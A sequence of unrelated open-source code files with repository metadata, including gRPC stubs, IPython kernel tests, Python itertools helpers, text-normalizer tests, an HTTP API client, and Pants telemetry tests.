insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CommonFriendsCount(request_iterator,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.stream_unary(request_iterator, target, '/Friendship/CommonFriendsCount',
friendship__pb2.PersonEmail.SerializeToString,
friendship__pb2.CommonFriendsResult.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def MakeFriends(request_iterator,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.stream_stream(request_iterator, target, '/Friendship/MakeFriends',
friendship__pb2.FriendshipRequest.SerializeToString,
friendship__pb2.FriendshipResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| {
"content_hash": "7d734df5c3649cbc9e97baadf6a2d35c",
"timestamp": "",
"source": "github",
"line_count": 168,
"max_line_length": 110,
"avg_line_length": 41.23809523809524,
"alnum_prop": 0.6280311778290993,
"repo_name": "ganeshmurthy/qpid-dispatch",
"id": "6510b7d78784a4018c9b2b1c012097bd2d04b590",
"size": "6998",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tests/friendship_pb2_grpc.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "2695814"
},
{
"name": "C++",
"bytes": "359957"
},
{
"name": "CMake",
"bytes": "54018"
},
{
"name": "CSS",
"bytes": "49129"
},
{
"name": "Dockerfile",
"bytes": "3230"
},
{
"name": "HTML",
"bytes": "2320"
},
{
"name": "JavaScript",
"bytes": "737682"
},
{
"name": "Objective-C",
"bytes": "1976"
},
{
"name": "Python",
"bytes": "2547017"
},
{
"name": "Shell",
"bytes": "34107"
}
],
"symlink_target": ""
} |
"""test IPython.embed_kernel()"""
#-------------------------------------------------------------------------------
# Copyright (C) 2012 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
# Imports
#-------------------------------------------------------------------------------
import os
import shutil
import sys
import tempfile
import time
from contextlib import contextmanager
from subprocess import Popen, PIPE
import nose.tools as nt
from IPython.zmq.blockingkernelmanager import BlockingKernelManager
from IPython.utils import path, py3compat
#-------------------------------------------------------------------------------
# Tests
#-------------------------------------------------------------------------------
def setup():
"""setup temporary IPYTHONDIR for tests"""
global IPYTHONDIR
global env
global save_get_ipython_dir
IPYTHONDIR = tempfile.mkdtemp()
env = os.environ.copy()
env["IPYTHONDIR"] = IPYTHONDIR
save_get_ipython_dir = path.get_ipython_dir
path.get_ipython_dir = lambda : IPYTHONDIR
def teardown():
path.get_ipython_dir = save_get_ipython_dir
try:
shutil.rmtree(IPYTHONDIR)
except (OSError, IOError):
# no such file
pass
@contextmanager
def setup_kernel(cmd):
"""start an embedded kernel in a subprocess, and wait for it to be ready
Returns
-------
kernel_manager: connected KernelManager instance
"""
kernel = Popen([sys.executable, '-c', cmd], stdout=PIPE, stderr=PIPE, env=env)
connection_file = os.path.join(IPYTHONDIR,
'profile_default',
'security',
'kernel-%i.json' % kernel.pid
)
# wait for connection file to exist, timeout after 5s
tic = time.time()
while not os.path.exists(connection_file) and kernel.poll() is None and time.time() < tic + 10:
time.sleep(0.1)
if kernel.poll() is not None:
o,e = kernel.communicate()
e = py3compat.cast_unicode(e)
raise IOError("Kernel failed to start:\n%s" % e)
if not os.path.exists(connection_file):
if kernel.poll() is None:
kernel.terminate()
raise IOError("Connection file %r never arrived" % connection_file)
km = BlockingKernelManager(connection_file=connection_file)
km.load_connection_file()
km.start_channels()
try:
yield km
finally:
km.stop_channels()
kernel.terminate()
def test_embed_kernel_basic():
"""IPython.embed_kernel() is basically functional"""
cmd = '\n'.join([
'from IPython import embed_kernel',
'def go():',
' a=5',
' b="hi there"',
' embed_kernel()',
'go()',
'',
])
with setup_kernel(cmd) as km:
shell = km.shell_channel
# oinfo a (int)
msg_id = shell.object_info('a')
msg = shell.get_msg(block=True, timeout=2)
content = msg['content']
nt.assert_true(content['found'])
msg_id = shell.execute("c=a*2")
msg = shell.get_msg(block=True, timeout=2)
content = msg['content']
nt.assert_equals(content['status'], u'ok')
# oinfo c (should be 10)
msg_id = shell.object_info('c')
msg = shell.get_msg(block=True, timeout=2)
content = msg['content']
nt.assert_true(content['found'])
nt.assert_equals(content['string_form'], u'10')
def test_embed_kernel_namespace():
"""IPython.embed_kernel() inherits calling namespace"""
cmd = '\n'.join([
'from IPython import embed_kernel',
'def go():',
' a=5',
' b="hi there"',
' embed_kernel()',
'go()',
'',
])
with setup_kernel(cmd) as km:
shell = km.shell_channel
# oinfo a (int)
msg_id = shell.object_info('a')
msg = shell.get_msg(block=True, timeout=2)
content = msg['content']
nt.assert_true(content['found'])
nt.assert_equals(content['string_form'], u'5')
# oinfo b (str)
msg_id = shell.object_info('b')
msg = shell.get_msg(block=True, timeout=2)
content = msg['content']
nt.assert_true(content['found'])
nt.assert_equals(content['string_form'], u'hi there')
# oinfo c (undefined)
msg_id = shell.object_info('c')
msg = shell.get_msg(block=True, timeout=2)
content = msg['content']
nt.assert_false(content['found'])
def test_embed_kernel_reentrant():
"""IPython.embed_kernel() can be called multiple times"""
cmd = '\n'.join([
'from IPython import embed_kernel',
'count = 0',
'def go():',
' global count',
' embed_kernel()',
' count = count + 1',
'',
'while True:'
' go()',
'',
])
with setup_kernel(cmd) as km:
shell = km.shell_channel
for i in range(5):
msg_id = shell.object_info('count')
msg = shell.get_msg(block=True, timeout=2)
content = msg['content']
nt.assert_true(content['found'])
nt.assert_equals(content['string_form'], unicode(i))
# exit from embed_kernel
shell.execute("get_ipython().exit_now = True")
msg = shell.get_msg(block=True, timeout=2)
time.sleep(0.2)
| {
"content_hash": "023604b8ce6dd8b947ccff9fb575457d",
"timestamp": "",
"source": "github",
"line_count": 193,
"max_line_length": 99,
"avg_line_length": 29.94300518134715,
"alnum_prop": 0.516698390725039,
"repo_name": "sodafree/backend",
"id": "0bf8f62ae2200696c4a3a741d41ef2a9f8ebfc2c",
"size": "5779",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "build/ipython/IPython/zmq/tests/test_embed_kernel.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Emacs Lisp",
"bytes": "21800"
},
{
"name": "JavaScript",
"bytes": "1050184"
},
{
"name": "Python",
"bytes": "21215906"
},
{
"name": "Shell",
"bytes": "7557"
},
{
"name": "VimL",
"bytes": "25012"
}
],
"symlink_target": ""
} |
import sys
import time
import decorator
import inspect
import itertools
import operator
def todict(obj, classkey=None):
""" Serialise object to dictionary, with optional 'classkey' """
if isinstance(obj, dict):
for k in obj.keys():
obj[k] = todict(obj[k], classkey)
return obj
elif callable(obj):
return obj.func_name
elif hasattr(obj, "__iter__"):
return [todict(v, classkey) for v in obj]
elif hasattr(obj, "__dict__"):
data = dict([(key, todict(value, classkey))
for key, value in obj.__dict__.iteritems()])
if classkey is not None and hasattr(obj, "__class__"):
data[classkey] = obj.__class__.__name__
return data
else:
return obj
# fixed width binary representation (@goo.gl/7udcK)
def bin(x, width):
return ''.join(str((x>>i)&1) for i in xrange(width-1,-1,-1))
@decorator.decorator
def aspect_import_mut(f, *args, **kwargs):
""" import module & adds it into the keyword arg namespace """
try:
if args:
module = args[0].strip()
if module.endswith(".pyc"):
module = module[:-len(".pyc")]
settings.MODULE_UNDER_TEST = module
kwargs['module'] = __import__(settings.MODULE_UNDER_TEST)
except ImportError as e:
print >> sys.stderr, "Module %s cannot be imported" \
% settings.MODULE_UNDER_TEST
return f(*args, **kwargs)
@decorator.decorator
def aspect_timer(f, *args, **kwargs):
""" adds timing aspect to function """
t0 = time.clock()
f(*args, **kwargs)
print >> sys.stderr, \
"\r\n*** Total time: %.3f seconds ***" % (time.clock()-t0)
return f
from blessings import Terminal
term = Terminal()
term_colors = {
'black': term.black,
'red': term.red,
'green': term.green,
'yellow': term.yellow,
'blue': term.blue,
'magenta': term.magenta,
'cyan': term.cyan,
'white': term.white,
}
def recursive_print(v, lvl):
if isinstance(v, dict):
print '{'
counter = 0
for _k,_v in v.iteritems():
if counter <= 3:
if inspect.isclass(_k):
print '\t'*lvl+term.bold_blue_on_bright_green(_k.__name__)+':',
else:
print '\t'*lvl+term.bold_blue_on_bright_green(str(_k))+':',
if any(map(lambda cls: isinstance(_v, cls), [list,set,dict])) \
and len(_v) > 1:
recursive_print(_v, lvl+1)
else:
print _v
counter += 1
else:
print '\t'*lvl+'...','['+str(len(v))+']'
break
print '\t'*(max(0,lvl-1))+'}'
elif isinstance(v, set):
print list(v)[0],'...','['+str(len(v))+']'
elif isinstance(v, list):
print v[0],'...','['+str(len(v))+']'
else:
print '<hidden>'
def debug(GLOBALS):
if term.is_a_tty:
print '===',term.underline('GLOBALS'), '==='
for k,v in sorted(GLOBALS.iteritems()):
# if k not in ['graph_fn_cfg']: continue
if isinstance(v, basestring):
print term.bold_cyan_on_bright_green(k) + ':',v
else:
print term.bold_cyan_on_bright_green(k) + ':',
recursive_print(v,1)
# itertools recipes
# @ http://docs.python.org/library/itertools.html
def take(n, iterable):
"Return first n items of the iterable as a list"
return list(islice(iterable, n))
def tabulate(function, start=0):
"Return function(0), function(1), ..."
return imap(function, count(start))
def consume(iterator, n):
"Advance the iterator n-steps ahead. If n is none, consume entirely."
# Use functions that consume iterators at C speed.
if n is None:
# feed the entire iterator into a zero-length deque
collections.deque(iterator, maxlen=0)
else:
# advance to the empty slice starting at position n
next(islice(iterator, n, n), None)
def nth(iterable, n, default=None):
"Returns the nth item or a default value"
return next(islice(iterable, n, None), default)
def quantify(iterable, pred=bool):
"Count how many times the predicate is true"
return sum(imap(pred, iterable))
def padnone(iterable):
"""Returns the sequence elements and then returns None indefinitely.
Useful for emulating the behavior of the built-in map() function.
"""
return chain(iterable, repeat(None))
def ncycles(iterable, n):
"Returns the sequence elements n times"
return itertools.chain.from_iterable(repeat(tuple(iterable), n))
def dotproduct(vec1, vec2, sum=sum, imap=itertools.imap, mul=operator.mul):
return sum(imap(mul, vec1, vec2))
def flatten(listOfLists):
"Flatten one level of nesting"
return itertools.chain.from_iterable(listOfLists)
def repeatfunc(func, times=None, *args):
"""Repeat calls to func with specified arguments.
Example: repeatfunc(random.random)
"""
if times is None:
return starmap(func, repeat(args))
return starmap(func, repeat(args, times))
def pairwise(iterable):
"s -> (s0,s1), (s1,s2), (s2, s3), ..."
a, b = tee(iterable)
next(b, None)
return izip(a, b)
def grouper(n, iterable, fillvalue=None):
"grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"
args = [iter(iterable)] * n
return izip_longest(fillvalue=fillvalue, *args)
def roundrobin(*iterables):
"roundrobin('ABC', 'D', 'EF') --> A D E B F C"
# Recipe credited to George Sakkis
pending = len(iterables)
nexts = cycle(iter(it).next for it in iterables)
while pending:
try:
for next in nexts:
yield next()
except StopIteration:
pending -= 1
nexts = cycle(islice(nexts, pending))
def powerset(iterable):
"powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
s = list(iterable)
return itertools.chain.from_iterable(itertools.combinations(s, r) for r in range(len(s)+1))
def unique_everseen(iterable, key=None):
"List unique elements, preserving order. Remember all elements ever seen."
# unique_everseen('AAAABBBCCDAABBB') --> A B C D
# unique_everseen('ABBCcAD', str.lower) --> A B C D
seen = set()
seen_add = seen.add
if key is None:
for element in ifilterfalse(seen.__contains__, iterable):
seen_add(element)
yield element
else:
for element in iterable:
k = key(element)
if k not in seen:
seen_add(k)
yield element
def unique_justseen(iterable, key=None):
"List unique elements, preserving order. Remember only the element just seen."
# unique_justseen('AAAABBBCCDAABBB') --> A B C D A B
# unique_justseen('ABBCcAD', str.lower) --> A B C A D
return imap(next, imap(itemgetter(1), groupby(iterable, key)))
def iter_except(func, exception, first=None):
""" Call a function repeatedly until an exception is raised.
Converts a call-until-exception interface to an iterator interface.
Like __builtin__.iter(func, sentinel) but uses an exception instead
of a sentinel to end the loop.
Examples:
bsddbiter = iter_except(db.next, bsddb.error, db.first)
heapiter = iter_except(functools.partial(heappop, h), IndexError)
dictiter = iter_except(d.popitem, KeyError)
dequeiter = iter_except(d.popleft, IndexError)
queueiter = iter_except(q.get_nowait, Queue.Empty)
setiter = iter_except(s.pop, KeyError)
"""
try:
if first is not None:
yield first()
while 1:
yield func()
except exception:
pass
def random_product(*args, **kwds):
"Random selection from itertools.product(*args, **kwds)"
pools = map(tuple, args) * kwds.get('repeat', 1)
return tuple(random.choice(pool) for pool in pools)
def random_permutation(iterable, r=None):
"Random selection from itertools.permutations(iterable, r)"
pool = tuple(iterable)
r = len(pool) if r is None else r
return tuple(random.sample(pool, r))
def random_combination(iterable, r):
"Random selection from itertools.combinations(iterable, r)"
pool = tuple(iterable)
n = len(pool)
indices = sorted(random.sample(xrange(n), r))
return tuple(pool[i] for i in indices)
def random_combination_with_replacement(iterable, r):
"Random selection from itertools.combinations_with_replacement(iterable, r)"
pool = tuple(iterable)
n = len(pool)
indices = sorted(random.randrange(n) for i in xrange(r))
return tuple(pool[i] for i in indices)
| {
"content_hash": "21f63d72c27ba44cb76e3fe87b9fe8ae",
"timestamp": "",
"source": "github",
"line_count": 256,
"max_line_length": 95,
"avg_line_length": 33.98046875,
"alnum_prop": 0.603172778480285,
"repo_name": "evandrix/Splat",
"id": "ff8b2141213c40a35bce91d8138713fc5947fb79",
"size": "8699",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "code/mypkg/common.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "6397"
},
{
"name": "Python",
"bytes": "695767"
},
{
"name": "Ruby",
"bytes": "37167"
},
{
"name": "Shell",
"bytes": "1261"
},
{
"name": "TeX",
"bytes": "250368"
}
],
"symlink_target": ""
} |
import unittest
from usig_normalizador_amba.commons import normalizarTexto, matcheaTexto
from usig_normalizador_amba.commons import MATCH_EXACTO, MATCH_PERMUTADO, MATCH_INCLUIDO, MATCH, NO_MATCH
class CommonsTestCase(unittest.TestCase):
def test_normalizarTexto_acentos(self):
res = normalizarTexto('ábçdéfǵhíjḱĺḿńñóṕqŕśtúvẃxýźÁBÇDÉFǴHÍJḰĹḾŃÑÓṔQŔŚTÚVẂXÝŹäëïöüÄËÏÖÜ')
self.assertEqual(res, 'abcdefghijklmnnopqrstuvwxyzabcdefghijklmnnopqrstuvwxyzaeiouaeiou')
def test_normalizarTexto_espacios(self):
res = normalizarTexto(' hola chau ')
self.assertEqual(res, 'hola chau')
def test_normalizarTexto_lower(self):
res = normalizarTexto(' hola á chau ', lower=False)
self.assertEqual(res, 'HOLA A CHAU')
def test_normalizarTexto_separador(self):
res = normalizarTexto(' hola á chau ', separador='_')
self.assertEqual(res, 'hola_a_chau')
def test_normalizarTexto_simbolos(self):
res = normalizarTexto('hola !#$%&/()=?¡@"\\\' chau')
self.assertEqual(res, 'hola chau')
def test_matcheaTexto_no_match(self):
res = matcheaTexto('partido de Lomas de Zamora', 'Lomas de Zamora')
self.assertEqual(res, NO_MATCH)
res = matcheaTexto('Lanús', 'Lomas de Zamora')
self.assertEqual(res, NO_MATCH)
def test_matcheaTexto_exacto(self):
res = matcheaTexto('Lomas de Zamora', 'Lomas de Zamora')
self.assertEqual(res, MATCH_EXACTO)
res = matcheaTexto('Lanus', 'Lanús')
self.assertEqual(res, MATCH_EXACTO)
def test_matcheaTexto_permutado(self):
res = matcheaTexto('de lomas zamora', 'Lomas de Zamora')
self.assertEqual(res, MATCH_PERMUTADO)
res = matcheaTexto('lomas zamora de', 'Lomas de Zamora')
self.assertEqual(res, MATCH_PERMUTADO)
res = matcheaTexto('zamora lomas de', 'Lomas de Zamora')
self.assertEqual(res, MATCH_PERMUTADO)
res = matcheaTexto('zamora de lomas', 'Lomas de Zamora')
self.assertEqual(res, MATCH_PERMUTADO)
def test_matcheaTexto_incluido(self):
res = matcheaTexto('Lomas', 'Lomas de Zamora')
self.assertEqual(res, MATCH_INCLUIDO)
res = matcheaTexto('Lomas de', 'Lomas de Zamora')
self.assertEqual(res, MATCH_INCLUIDO)
res = matcheaTexto('Lomas ZAMORA', 'Lomas de Zamora')
self.assertEqual(res, MATCH_INCLUIDO)
res = matcheaTexto('ZAMORA Lomas', 'Lomas de Zamora')
self.assertEqual(res, MATCH_INCLUIDO)
def test_matcheaTexto_match(self):
res = matcheaTexto('', 'Lomas de Zamora')
self.assertEqual(res, MATCH)
res = matcheaTexto('Lom ZAM', 'Lomas de Zamora')
self.assertEqual(res, MATCH)
def test_matcheaTexto_normalizacion(self):
res = matcheaTexto('- (lomas, dé, zámórá)-', 'Lomas de Zamora')
self.assertEqual(res, MATCH_EXACTO)
def test_matcheaTexto_case(self):
res = matcheaTexto('lOMAS DE zAMORA', 'Lomas de Zamora')
self.assertEqual(res, MATCH_EXACTO)
def test_matcheaTexto_no_normalizar_no_match(self):
res = matcheaTexto('Lanus', 'Lanús', normalizar=False)
self.assertEqual(res, NO_MATCH)
res = matcheaTexto('- (lomas, dé, zámórá)-', 'Lomas de Zamora', normalizar=False)
self.assertEqual(res, NO_MATCH)
res = matcheaTexto('de lomas zamora', 'Lomas de Zamora', normalizar=False)
self.assertEqual(res, NO_MATCH)
res = matcheaTexto('lOMAS DE zAMORA', 'Lomas de Zamora', normalizar=False)
self.assertEqual(res, NO_MATCH)
| {
"content_hash": "fa6627f9b3313bfa7a45baef5500cd0c",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 105,
"avg_line_length": 43.71084337349398,
"alnum_prop": 0.6595920617420066,
"repo_name": "usig/normalizador-amba",
"id": "78279f4ad05e2dc573c08357c91cb026a6db2758",
"size": "3713",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/CommonsTestCase.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "431"
},
{
"name": "Python",
"bytes": "130246"
}
],
"symlink_target": ""
} |
import hashlib
import os
import errno
import tempfile
from json import dumps as json_dumps
import requests
from .exception import SurvoxAPIException, SurvoxAPINotFound
class SurvoxAPIBase:
"""
Base class to use requests to interact with the Survox API
"""
def __init__(self, base_url, headers, verbose=True):
self.base_url = base_url
self.auth_headers = headers
self.verbose = verbose
def api_get(self, endpoint, headers=None, full_response=False, **kwargs):
"""
Make a GET request to the specified endpoint
:param endpoint: api endpoint
:param headers: extra headers to pass with request
:param full_response: return the requests response structure
:return: api response data, or full requests response structure
"""
endpoint, headers = self._update_request_info('GET', endpoint, headers)
query = {k: v for (k, v) in kwargs.items() if v is not None}
r = requests.get(url=endpoint, headers=headers, params=query)
if full_response:
return r
return self._check_response(r, 'GET', endpoint)
def api_post(self, endpoint, data=None, json=None, headers=None, full_response=False, **kwargs):
"""
Make a POST request to the specified endpoint
:param endpoint: api endpoint
:param data: data to post
:param json: data to post in json format
:param headers: extra headers to pass with request
:param full_response: return the requests response structure
:return: api response data, or full requests response structure
"""
endpoint, headers = self._update_request_info('POST', endpoint, headers)
query = {k: v for (k, v) in kwargs.items() if v is not None}
if json:
headers.update({"Content-Type": "application/json"})
r = requests.post(endpoint, data=json_dumps(json), headers=headers, params=query)
else:
r = requests.post(url=endpoint, data=data, headers=headers, params=query)
if full_response:
return r
return self._check_response(r, 'POST', endpoint)
def api_put(self, endpoint, data=None, json=None, headers=None, files=None, full_response=False, **kwargs):
"""
Make a PUT request to the specified endpoint
:param endpoint: api endpoint
:param data: data to post, works for simple dictionaries
:param json: data to post using json for nested dictionaries, etc.
:param headers: extra headers to pass with request
:param files: files object to upload
:param full_response: return the requests response structure
:return: api response data, or full requests response structure
"""
endpoint, headers = self._update_request_info('PUT', endpoint, headers)
query = {k: v for (k, v) in kwargs.items() if v is not None}
if files:
return requests.put(url=endpoint, data=data, headers=headers, files=files, params=query)
if json:
r = requests.put(url=endpoint, json=json_dumps(json), headers=headers, params=query)
else:
r = requests.put(url=endpoint, data=data, headers=headers, params=query)
if full_response:
return r
return self._check_response(r, 'PUT', endpoint)
def api_delete(self, endpoint, headers=None, full_response=False, **kwargs):
"""
Make a DELETE request to the specified endpoint
:param endpoint: api endpoint
:param headers: extra headers to pass with request
:param full_response: return the requests response structure
:return: api response data, or full requests response structure
"""
endpoint, headers = self._update_request_info('DELETE', endpoint, headers)
query = {k: v for (k, v) in kwargs.items() if v is not None}
r = requests.delete(url=endpoint, headers=headers, params=query)
if full_response:
return r
return self._check_response(r, 'DELETE', endpoint)
def _update_request_info(self, method, endpoint, headers):
if not (endpoint.startswith(self.base_url) or endpoint.startswith("http")):
if not endpoint.startswith('/'):
endpoint = self.base_url + '/' + endpoint
else:
endpoint = self.base_url + endpoint
if headers:
headers.update(self.auth_headers)
else:
headers = self.auth_headers
if self.verbose:
print('Request {method} {endpoint}'.format(method=method, endpoint=endpoint))
return endpoint, headers
def _check_response(self, r, method, endpoint):
if self.verbose:
print('Response {method} {endpoint} {result} {length}'.format(method=method, endpoint=endpoint,
result=r.status_code, length=len(r.text)))
if not 200 <= r.status_code < 300:
if r.status_code == 404:
raise SurvoxAPINotFound(method, endpoint, r)
else:
raise SurvoxAPIException(method, endpoint, r)
try:
payload = r.json()
except Exception:
raise SurvoxAPIException(method, endpoint, r)
if 'status' not in payload or payload['status'] != 'success':
raise SurvoxAPIException(method, endpoint, r)
if 'data' not in payload:
raise SurvoxAPIException(method, endpoint, r)
return payload['data']
def api_upload(self, endpoint, filename, block_size=None):
"""
Make a DELETE request to the specified endpoint
:param endpoint: api endpoint
:param filename: name of the file to upload
:param block_size: max size of a file block to send at a time
:return: api response data, or full requests response structure
"""
if not os.path.isfile(filename):
raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), filename)
hash_md5 = hashlib.md5()
file_size = os.path.getsize(filename)
upload_name = os.path.basename(filename)
if not block_size:
block_size = 1000000
with open(filename, "rb") as f:
offset = 0
for block in iter(lambda: f.read(block_size), b""):
hash_md5.update(block)
temp = tempfile.NamedTemporaryFile()
temp.write(block)
temp.seek(0)
chunk_end = offset + len(block)
my_headers = {
'CONTENT-RANGE': "bytes {offset}-{chunk_end}/{filesize}".format(offset=offset,
chunk_end=chunk_end,
filesize=file_size)
}
cur_data = {'filename': upload_name}
file = [('file', (temp.name, block))]
res = self.api_put(endpoint=endpoint, headers=my_headers, data=cur_data, files=file, full_response=True)
temp.close()
try:
content = res.json()
except ValueError:
raise RuntimeError('Content' + res.text)
if content['status'] != "success":
raise RuntimeError(content['data'])
offset = chunk_end
endpoint = content['data']['url']
md5hash = hash_md5.hexdigest()
# Finalize this thing
cur_data = {"md5": "{hash}".format(hash=md5hash)}
res = self.api_post(endpoint=endpoint, data=cur_data, full_response=True)
try:
content = res.json()
except ValueError:
raise RuntimeError('Content' + res.text)
if content['status'] != "success":
raise RuntimeError(content['data'])
return content['data']
def api_download(self, endpoint, filename, headers=None):
"""
Download a file from the API endpoint
:param endpoint: api endpoint
:param filename: file to save response in
:param headers: any additional headers to send when making request
:return: None
"""
endpoint, headers = self._update_request_info('DOWNLOAD', endpoint, headers)
return_headers = {}
with open(filename, 'wb') as handle:
response = requests.get(endpoint, headers=headers, stream=True)
if not response.ok:
raise RuntimeError("Unable to download file from {url}".format(url=endpoint))
for h, v in response.headers.items():
return_headers[h] = v
for block in response.iter_content(1024):
handle.write(block)
return return_headers
| {
"content_hash": "2af9deaea961ab9de2828d196f2822c3",
"timestamp": "",
"source": "github",
"line_count": 204,
"max_line_length": 120,
"avg_line_length": 43.78431372549019,
"alnum_prop": 0.5867666815942678,
"repo_name": "cbeauvais/zAWygzxkeSjUBGGVsgMGTF56xvR",
"id": "60736d5841e43baeeeddea70d36efb100f22e764",
"size": "8932",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "survox_api/resources/base.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "89943"
},
{
"name": "Shell",
"bytes": "2352"
}
],
"symlink_target": ""
} |
# Copyright (c) 2015, LE GOFF Vincent
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of ytranslate nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Module containing the Command class, described below."""
from ytranslate.commands.base import BaseCommand
from ytranslate.commands.catalogs import CatalogsCommand
from ytranslate.commands.update import UpdateCommand
class Command(BaseCommand):
"""Main command, parents of them all."""
def __init__(self):
BaseCommand.__init__(self)
self.add_subcommand(CatalogsCommand)
self.add_subcommand(UpdateCommand)
| {
"content_hash": "e0c111a5856668d589ed003425a0c3bb",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 80,
"avg_line_length": 45.883720930232556,
"alnum_prop": 0.7759756715661429,
"repo_name": "vlegoff/ytranslate",
"id": "c9e91b05e719583300c9284de258d6ee7783585e",
"size": "1975",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ytranslate/commands/command.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "53550"
}
],
"symlink_target": ""
} |
from __future__ import annotations
from pants.testutil.pants_integration_test import run_pants
_no_explicit_setting_msg = "An explicit setting will get rid of this message"
_no_repo_id_msg = 'set `repo_id = "<uuid>"` in the [anonymous-telemetry] section of pants.toml'
_bad_repo_id_msg = "must be between 30 and 60 characters long"
def test_warn_if_no_explicit_setting() -> None:
result = run_pants(["roots"], config={})
result.assert_success()
assert _no_explicit_setting_msg in result.stderr
assert _no_repo_id_msg not in result.stderr
assert _bad_repo_id_msg not in result.stderr
def test_warn_if_repo_id_unset() -> None:
result = run_pants(["roots"], config={"anonymous-telemetry": {"enabled": True}})
result.assert_success()
assert _no_explicit_setting_msg not in result.stderr
assert _no_repo_id_msg in result.stderr
assert _bad_repo_id_msg not in result.stderr
def test_warn_if_repo_id_invalid() -> None:
result = run_pants(
["roots"],
config={"anonymous-telemetry": {"enabled": True, "repo_id": "tooshort"}},
)
result.assert_success()
assert _no_explicit_setting_msg not in result.stderr
assert _no_repo_id_msg not in result.stderr
assert _bad_repo_id_msg in result.stderr
def test_no_warn_if_explicitly_on() -> None:
result = run_pants(
["roots"],
config={"anonymous-telemetry": {"enabled": True, "repo_id": 36 * "a"}},
use_pantsd=False,
)
result.assert_success()
assert _no_explicit_setting_msg not in result.stderr
assert _no_repo_id_msg not in result.stderr
assert _bad_repo_id_msg not in result.stderr
def test_no_warn_if_explicitly_off() -> None:
result = run_pants(["roots"], config={"anonymous-telemetry": {"enabled": False}})
result.assert_success()
assert _no_explicit_setting_msg not in result.stderr
assert _no_repo_id_msg not in result.stderr
assert _bad_repo_id_msg not in result.stderr
| {
"content_hash": "1ce30cd8d9e470d4ac605688f4952ae4",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 95,
"avg_line_length": 36.46296296296296,
"alnum_prop": 0.6749619095987811,
"repo_name": "patricklaw/pants",
"id": "9d1d44d581dceafc5c303e7f564c888b31379548",
"size": "2101",
"binary": false,
"copies": "3",
"ref": "refs/heads/scala",
"path": "src/python/pants/goal/anonymous_telemetry_integration_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
import sys
sys.path.insert(0, "../..")
from Cube import *
from Machine import *
if sys.version_info[0] >= 3:
raw_input = input
#Define global variables
globalVarCount = {} #10000
globalVarCount[BOOL] = INITIALGLOBALBOOL
globalVarCount[INT] = INITIALGLOBALINT
globalVarCount[FLOAT] = INITIALGLOBALFLOAT
globalVarCount[STRING] = INITIALGLOBALSTRING
localVarCount = {} #20000
localVarCount[BOOL] = INTIALLOCALBOOL
localVarCount[INT] = INTIALLOCALINT
localVarCount[FLOAT] = INTIALLOCALFLOAT
localVarCount[STRING] = INTIALLOCALSTRING
tempVarCount = {} #30000
tempVarCount[BOOL] = INITIALTEMPBOOL
tempVarCount[INT] = INITIALTEMPINT
tempVarCount[FLOAT] = INTIALTEMPFLOAT
tempVarCount[STRING] = INITIALTEMPSTRING
constVarCount = {} #40000
constVarCount[BOOL] = INITIALCONSTBOOL
constVarCount[INT] = INITIALCONSTINT
constVarCount[FLOAT] = INITIALCONSTFLOAT
constVarCount[STRING] = INTIALCONSTSTRING
quadruples = []
operandStack = []
operationStack = []
jumpStack = []
sendParams = []
argumentCount = 0
